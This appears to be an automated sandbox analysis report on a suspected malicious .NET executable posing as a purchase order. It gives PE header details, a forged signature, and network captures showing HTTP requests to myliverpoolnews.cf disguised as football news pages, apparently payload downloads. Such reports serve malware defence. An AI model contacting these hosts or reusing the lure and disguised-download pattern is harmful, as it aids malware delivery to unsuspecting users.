                                                                                    SSDEEP:768:/FmaU0mnYm/8KfVJlIAHcQxGflnBieit0JLkbPd2HdPIZy75V3qKncMrGDDkhx6Z:/FmaU0mnYm/XfFHcQiv2
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..^..........~}... ........@.. ..............................S.....@................................

                                                                                    File Icon

                                                                                    Icon Hash:00828e8e8686b000

                                                                                    Static PE Info

                                                                                    General

                                                                                    Entrypoint:0x407d7e
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:true
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                    Time Stamp:0xEDF52E0E [Wed Jul 4 19:25:02 2096 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:v4.0.30319
                                                                                    OS Version Major:4
                                                                                    OS Version Minor:0
                                                                                    File Version Major:4
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:4
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                    Authenticode Signature

                                                                                    Signature Valid:false
                                                                                    Signature Issuer:C=SoWutqXeLnMOwqJXId, S=NnUboBWoYwqDIwY, L=MbQcaOFzeHlcRYjymxStxewIKRBTmsTOLhaAui, T=TzAsjhqPvzbVTQm, E=aWqTCgKxvSbvBYMruQaKZAVvZLTXwFQbGWtnMFYTbrwiC, OU=VDEHuCSrWVaYfpynkGXgslgiPshrtkDGheEyNpkXvynJDYrAu, O=LNLPWkIrAxQDzcsXFAnPjFEWxPTohWRIy, CN=QyacKfEuUpipdGqortkydaovyOIOBGilxuiv
                                                                                    Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                    Error Number:-2146762487
                                                                                    Not Before, Not After
                                                                                    • 4/8/2021 12:06:52 AM 4/8/2022 12:06:52 AM
                                                                                    Subject Chain
                                                                                    • C=SoWutqXeLnMOwqJXId, S=NnUboBWoYwqDIwY, L=MbQcaOFzeHlcRYjymxStxewIKRBTmsTOLhaAui, T=TzAsjhqPvzbVTQm, E=aWqTCgKxvSbvBYMruQaKZAVvZLTXwFQbGWtnMFYTbrwiC, OU=VDEHuCSrWVaYfpynkGXgslgiPshrtkDGheEyNpkXvynJDYrAu, O=LNLPWkIrAxQDzcsXFAnPjFEWxPTohWRIy, CN=QyacKfEuUpipdGqortkydaovyOIOBGilxuiv
                                                                                    Version:3
                                                                                    Thumbprint MD5:02D117FF6729F8502B772DCB43B50C3A
                                                                                    Thumbprint SHA-1:AD87EC167C0EE2A6460B720995D1615054EFD17C
                                                                                    Thumbprint SHA-256:EAC36CA8694D2ABDF442E1AD9F62C45DDF61B2AF796C976F70010E21DABF7754
                                                                                    Serial:0085C0DD93B9A20656D03F3DDE5B6544CB

                                                                                    Entrypoint Preview

                                                                                    Instruction
                                                                                    jmp dword ptr [00402000h]
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al

                                                                                    Data Directories

                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x7d280x53.text
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x80000x598.rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x68000x1508.text
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xa0000xc.reloc
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                    Sections

                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    .text0x20000x5d840x5e00False0.310588430851data6.24624470623IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                    .rsrc0x80000x5980x600False0.41015625data4.03133223021IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .reloc0xa0000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                    Resources

                                                                                    NameRVASizeTypeLanguageCountry
                                                                                    RT_VERSION0x80a00x30cdata
                                                                                    RT_MANIFEST0x83ac0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                                    Imports

                                                                                    DLLImport
                                                                                    mscoree.dll_CorExeMain

                                                                                    Version Infos

                                                                                    DescriptionData
                                                                                    Translation0x0000 0x04b0
                                                                                    LegalCopyrightCopyright 2021
                                                                                    Assembly Version1.0.0.0
                                                                                    InternalNameDimbono.exe
                                                                                    FileVersion1.0.0.0
                                                                                    CompanyName
                                                                                    LegalTrademarks
                                                                                    Comments
                                                                                    ProductNameDimbono
                                                                                    ProductVersion1.0.0.0
                                                                                    FileDescriptionDimbono
                                                                                    OriginalFilenameDimbono.exe

                                                                                    Network Behavior

                                                                                    Network Port Distribution

                                                                                    TCP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Apr 8, 2021 12:23:50.074418068 CEST4970380192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.103115082 CEST8049703172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.103264093 CEST4970380192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.103962898 CEST4970380192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.132519007 CEST8049703172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.195653915 CEST8049703172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.226291895 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.254749060 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.254941940 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.285983086 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.315032005 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.318490982 CEST4970380192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.351553917 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.351607084 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.351763964 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.359153032 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.387747049 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.388421059 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.451097012 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.479623079 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.662647963 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.662663937 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.662692070 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.662703037 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.662728071 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.662739992 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.662756920 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.662767887 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.662791014 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.662801981 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.662869930 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.662909031 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.663194895 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.663213015 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.663480043 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.663499117 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.827023029 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.827039003 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.827157974 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.827208996 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.827210903 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.827601910 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.827622890 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.827708960 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.827974081 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.828218937 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.828233004 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.828324080 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.829154015 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.829169035 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.829372883 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.829495907 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.829551935 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.829683065 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.830291033 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.830306053 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.830651999 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.830780029 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.831639051 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.831650972 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.831671000 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.831770897 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.832148075 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.832160950 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.832395077 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.832854033 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.832868099 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.832951069 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.833547115 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.833559990 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.833734035 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.834213018 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.834225893 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.834347963 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.835005999 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.835035086 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.835417032 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.835597992 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.835613012 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.835979939 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.836270094 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.836349010 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.836896896 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.836910963 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.837260962 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.837270975 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.837651968 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.837676048 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.838177919 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.838206053 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.838280916 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.838500977 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.838963032 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.855664968 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.855694056 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.855797052 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.855849981 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.855865002 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.856442928 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.856614113 CEST44349704172.67.150.212192.168.2.3

                                                                                    UDP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Apr 8, 2021 12:23:42.917279005 CEST5128153192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:23:42.929795980 CEST53512818.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:23:44.470633030 CEST4919953192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:23:44.483788967 CEST53491998.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:23:45.276004076 CEST5062053192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:23:45.289416075 CEST53506208.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.030350924 CEST6493853192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:23:50.051722050 CEST53649388.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.210664988 CEST6015253192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:23:50.224140882 CEST53601528.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.612390995 CEST5754453192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:23:50.625015020 CEST53575448.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:23:59.172339916 CEST5598453192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:23:59.184833050 CEST53559848.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:23:59.422822952 CEST6418553192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:23:59.437611103 CEST53641858.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:24:02.751158953 CEST6511053192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:24:02.763899088 CEST53651108.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:24:06.747265100 CEST5836153192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:24:06.760493040 CEST53583618.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:24:07.610752106 CEST6349253192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:24:07.624152899 CEST53634928.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:24:08.875972033 CEST6083153192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:24:08.887880087 CEST53608318.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:24:10.049112082 CEST6010053192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:24:10.061590910 CEST53601008.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:24:10.814594984 CEST5319553192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:24:10.827524900 CEST53531958.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:24:11.909168005 CEST5014153192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:24:11.925478935 CEST53501418.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:24:12.664707899 CEST5302353192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:24:12.677476883 CEST53530238.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:24:14.338356972 CEST4956353192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:24:14.351156950 CEST53495638.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:24:15.088790894 CEST5135253192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:24:15.101512909 CEST53513528.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:24:16.885636091 CEST5934953192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:24:16.897653103 CEST53593498.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:24:18.523852110 CEST5708453192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:24:18.535731077 CEST53570848.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:24:19.051294088 CEST5882353192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:24:19.070105076 CEST53588238.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:24:19.475449085 CEST5756853192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:24:19.489020109 CEST53575688.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:24:20.178817987 CEST5054053192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:24:20.191713095 CEST53505408.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:24:22.196455002 CEST5436653192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:24:22.209259033 CEST53543668.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:24:23.142556906 CEST5303453192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:24:23.155062914 CEST53530348.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:24:32.258898973 CEST5776253192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:24:32.271538973 CEST53577628.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:24:35.758364916 CEST5543553192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:24:35.776567936 CEST53554358.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:24:48.868444920 CEST5071353192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:24:48.887140036 CEST53507138.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:25:10.328861952 CEST5613253192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:25:10.354651928 CEST53561328.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:25:37.976799965 CEST5898753192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:25:38.001267910 CEST53589878.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:25:39.255680084 CEST5657953192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:25:39.273714066 CEST53565798.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:26:15.222662926 CEST6063353192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:26:15.235543966 CEST53606338.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:26:19.379484892 CEST6129253192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:26:19.405441046 CEST53612928.8.8.8192.168.2.3

                                                                                    DNS Queries

                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                    Apr 8, 2021 12:23:50.030350924 CEST192.168.2.38.8.8.80xa3c7Standard query (0)myliverpoolnews.cfA (IP address)IN (0x0001)
                                                                                    Apr 8, 2021 12:23:50.210664988 CEST192.168.2.38.8.8.80x5299Standard query (0)myliverpoolnews.cfA (IP address)IN (0x0001)

                                                                                    DNS Answers

                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                    Apr 8, 2021 12:23:50.051722050 CEST8.8.8.8192.168.2.30xa3c7No error (0)myliverpoolnews.cf172.67.150.212A (IP address)IN (0x0001)
                                                                                    Apr 8, 2021 12:23:50.051722050 CEST8.8.8.8192.168.2.30xa3c7No error (0)myliverpoolnews.cf104.21.56.119A (IP address)IN (0x0001)
                                                                                    Apr 8, 2021 12:23:50.224140882 CEST8.8.8.8192.168.2.30x5299No error (0)myliverpoolnews.cf172.67.150.212A (IP address)IN (0x0001)
                                                                                    Apr 8, 2021 12:23:50.224140882 CEST8.8.8.8192.168.2.30x5299No error (0)myliverpoolnews.cf104.21.56.119A (IP address)IN (0x0001)

                                                                                    HTTP Request Dependency Graph

                                                                                    • myliverpoolnews.cf

                                                                                    HTTP Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    0192.168.2.349703172.67.150.21280C:\Users\user\Desktop\08042021New-PurchaseOrder.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    Apr 8, 2021 12:23:50.103962898 CEST940OUTGET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-E349A863A698863617D7B55886FAE832.html HTTP/1.1
                                                                                    UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41
                                                                                    Host: myliverpoolnews.cf
                                                                                    Connection: Keep-Alive
                                                                                    Apr 8, 2021 12:23:50.195653915 CEST941INHTTP/1.1 301 Moved Permanently
                                                                                    Date: Thu, 08 Apr 2021 10:23:50 GMT
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: max-age=3600
                                                                                    Expires: Thu, 08 Apr 2021 11:23:50 GMT
                                                                                    Location: https://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-E349A863A698863617D7B55886FAE832.html
                                                                                    cf-request-id: 09529b876d0000cdbfa7195000000001
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=WCJBx8hERcJIAqHjl%2Bi8%2BixsL9oG4CObGFRIAoVqdbePV4nx8DfVuek8YYN8SziI5qEOSLCyX4JYtrDljLVgQqw%2FznHF1ds89Rzlfhu7nohq7aA%3D"}],"max_age":604800,"group":"cf-nel"}
                                                                                    NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 63cac852499dcdbf-CDG
                                                                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0
                                                                                    Apr 8, 2021 12:23:51.299626112 CEST2253OUTGET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-ADD8B69CFB72A4D5DBAFC5A0A255FA77.html HTTP/1.1
                                                                                    UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41
                                                                                    Host: myliverpoolnews.cf
                                                                                    Apr 8, 2021 12:23:51.334906101 CEST2253INHTTP/1.1 301 Moved Permanently
                                                                                    Date: Thu, 08 Apr 2021 10:23:51 GMT
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: max-age=3600
                                                                                    Expires: Thu, 08 Apr 2021 11:23:51 GMT
                                                                                    Location: https://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-ADD8B69CFB72A4D5DBAFC5A0A255FA77.html
                                                                                    cf-request-id: 09529b8c150000cdbfcc8fa000000001
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=aLEY%2BEnS4BG4xv12NRCilWDALqZwCYuNniwo1v6CysW6ZLzxo7KbvzB4aBAkdzqzDjpRGzsqpqtIzqJal3d45%2F6qBY4R59n5RxOxfTPQ8Cp4TLY%3D"}],"max_age":604800,"group":"cf-nel"}
                                                                                    NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                    Server: cloudflare
